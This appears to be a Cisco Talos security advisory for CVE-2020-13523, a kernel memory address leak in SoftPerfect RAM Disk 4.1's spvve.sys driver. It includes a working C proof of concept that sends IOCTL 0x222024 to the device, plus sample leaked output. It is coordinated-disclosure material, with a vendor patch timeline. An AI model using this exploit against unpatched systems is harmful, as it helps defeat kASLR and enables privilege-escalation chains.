Headline
CVE-2020-13523: TALOS-2020-1122 || Cisco Talos Intelligence Group
An exploitable information disclosure vulnerability exists in SoftPerfect’s RAM Disk 4.1 spvve.sys driver. A specially crafted I/O request packet (IRP) can cause the disclosure of sensitive information. An attacker can send a malicious IRP to trigger this vulnerability.
Summary
An exploitable information disclosure vulnerability exists in SoftPerfect’s RAM Disk 4.1 spvve.sys driver. A specially crafted I/O request packet (IRP) can cause the disclosure of sensitive information. An attacker can send a malicious IRP to trigger this vulnerability.
Tested Versions
SoftPerfect RAM Disk 4.1
Product URLs
https://www.softperfect.com/products/ramdisk/
CVSSv3 Score
3.8 - CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N
CWE
CWE-200 - Information Exposure
Details
SoftPerfect RAM Disk is a high-performance RAM disk application that lets the user store a disk from their computer stored on the device’s memory.
The spvve.sys driver creates a device object Device\SoftPerfectVolume that is accessible to any user on the system so any user sending specially crafted I/O request packet (IRP) can cause information disclosure (leak kernel pool memory address).
int main()
{
const wchar_t* errmsg = NULL;
LPCWSTR deviceName = L"\\Device\\SoftPerfectVolume";
HANDLE hDevice = OpenDeviceWorker(deviceName, GENERIC_READ | GENERIC_WRITE, &errmsg, TRUE);
if (hDevice == INVALID_HANDLE_VALUE) {
if (errmsg == NULL) {
printf("error: something in OpenDeviceEx failed\n");
}
else {
wprintf(L"error: %s\n", errmsg);
}
}
const DWORD inBufferSize = 8;
const DWORD outBufferSize = 16;
PBYTE inBuffer = new BYTE[inBufferSize];
PBYTE outBuffer = new BYTE[outBufferSize];;
DWORD returned;
//kernel pool memory address leak
printf("DeviceIoControl IOCTL : 0x222024\n");
DeviceIoControl(hDevice,
0x222024,
inBuffer,
inBufferSize,
outBuffer,
outBufferSize,
&returned,
0);
neolib::hex_dump(outBuffer, outBufferSize, std::cout);
return 0;
}
output:
C:\tmp\ramdisk>RamDiskMemLeak.exe
DeviceIoControl IOCTL : 0x222024
0000 : ....h....2...2.. D0 96 EA 00 68 92 EA 00 00 32 EA 00 00 32 EA 00
C:\tmp\ramdisk>RamDiskMemLeak.exe
DeviceIoControl IOCTL : 0x222024
0000 : h8O...O......0.. 68 38 4F 01 C0 00 4F 01 07 00 00 07 B0 30 00 00
C:\tmp\ramdisk>RamDiskMemLeak.exe
DeviceIoControl IOCTL : 0x222024
0000 : .!.............. A8 21 FD 00 C0 00 FD 00 00 00 00 00 00 00 00 00
This kind of vulnerability can allow an attacker to bypass kASLR mitigation and open possibility to local privilage escalation when used in conjunction with another vulnerability.
Timeline
2020-07-16 - Vendor Disclosure
2020-07-23 - Vendor Patched
2020-08-04 - Public Release
Discovered by a member of Cisco Talos.